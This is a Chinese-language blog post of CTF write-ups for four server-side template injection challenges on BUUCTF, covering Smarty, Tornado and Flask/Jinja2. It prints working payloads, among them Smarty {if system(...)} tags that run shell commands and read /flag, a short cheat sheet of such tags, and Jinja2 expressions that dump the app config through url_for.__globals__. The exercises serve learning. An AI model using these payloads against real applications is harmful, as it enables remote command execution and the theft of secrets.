BUUCTF SSTI

[BJDCTF2020]The mystery of ip

考点:SSTI-smarty

解题

习惯性打开Flag,进入/flag.php,“Your IP is : 172.16.170.85”,抓包,添加XFF,发现可控,然后不会利用,还是搜wp,测试存在ssti,用版本号,测出是Smarty模板,直接用它的payload就给解出来了
DGeedx.png

总结

在发现可控点后,没想到是ssti

[护网杯 2018]easy_tornado

考点:SSTI-tornado模板
Tornado是python的web框架
打开题目是3个txt的链接:

依次打开,注意url:

flag在/fllllllllllllag



cookie_secret:https://tornado-zh.readthedocs.io/zh/latest/guide/security.html

把cookie_secret+md5(filename)进行md5就是filehash,要想办法弄出cookie_secret

尝试访问/file?filename=/fllllllllllllag,url出现error?msg=Error,发现msg参数可控,其实file?filename=,(filename的值随意)也是同样的结果

服务端模版注入漏洞检测payload整理

发现过滤了数学运算符

下载tornado框架源码,导入pycharm,全局搜索cookie_secret:

看到cookie_secret在handler.application.settings配置中。

利用cookie_secret,求出filehash:

<?php
$cookie_secret = '4dea0e25-9f47-4263-9be8-5b49b83ae3ec';
echo md5($cookie_secret.md5('/fllllllllllllag'));

payload:/file?filename=/fllllllllllllag&filehash=d42012554c615c9eabad5dd6533a2bb9
flag:

[CISCN2019 华东南赛区]Web11(Smarty SSTI)


1、右上角的当前IP是buu靶机的内网IP;最下面的“Build With Smarty !”可猜网页用PHP的Smarty引擎;中间XFF,猜测XFF处可能是SSTI注入点
{$smarty} 保留变量

可得Smarty版本为3.1.30,确定是Smarty的SSTI

2、ls查看目录下有哪些文件:{if system("ls /")}{/if}

查看flag:{if system("cat /flag")}{/if}

笔记

Smarty常用payload:

利用smarty的{if}条件

  • {$smarty.version}查看smarty版本号

  • {if phpinfo()}{/if}查看php信息

  • {if system('ls /')}{/if}查看根目录下的文件

[WesternCTF2018]shrine

考点:SSTI-Flask模板

解题:


查看页面源代码:

import flask
import os

app = flask.Flask(__name__)//参数__name__,获取当前文件名__main__;app是一个flask对象

app.config['FLAG'] = os.environ.pop('FLAG')


@app.route('/') # 设置路由,读文件源码
def index(): # 首页函数
    return open(__file__).read()


@app.route('/shrine/<path:shrine>')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')#把()替换为空格
        blacklist = ['config', 'self'] #黑名单
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s #把config和self替换为空格

    return flask.render_template_string(safe_jinja(shrine))#模板渲染


if __name__ == '__main__':
    app.run(debug=True) #开发时,开启debug调试模式,只要代码改变,服务器会重新加载代码

1、测试,存在ssti

http://c78aa7fd-7ab6-406a-8059-001ee91d59ef.node3.buuoj.cn/shrine/{{7*7}}

2、

app.config['FLAG'] = os.environ.pop('FLAG')

这里说明flag在config中
当创建1个Flask对象(也就是app),就可以通过app.config来查看这个app的所有配置变量

s = s.replace('(', '').replace(')', '')#过滤了括号
blacklist = ['config', 'self'] #黑名单

本来我们可以使用config({{config}})或self({{self.__dict__}})获取信息,但这题把它们过滤了
好在python有一些内置函数

  • url_for
  • get_flashed_messages

官方文档:
https://flask.palletsprojects.com/en/1.0.x/api/#flask.url_forbaobaoer.cn/archives/656/python-b2e7b180e9b880e793
https://flask.palletsprojects.com/en/1.0.x/api/#flask.get_flashed_messages

url_for.__globals__:以字典类型返回当前位置的全部全局变量
注入url_for方法:

这个current_app是当前app,查看current_app下的config信息

/shrine/{{url_for.__globals__['current_app'].config}}

解法2:
同理,payload:

{{get_flashed_messages.__globals__['current_app'].config['FLAG']}}

参考链接:

flask之ssti模版注入从零到入门
Python模板注入(SSTI)深入学习

posted @ 2020-09-28 12:53  Pur3  阅读(1271)  评论(0编辑  收藏  举报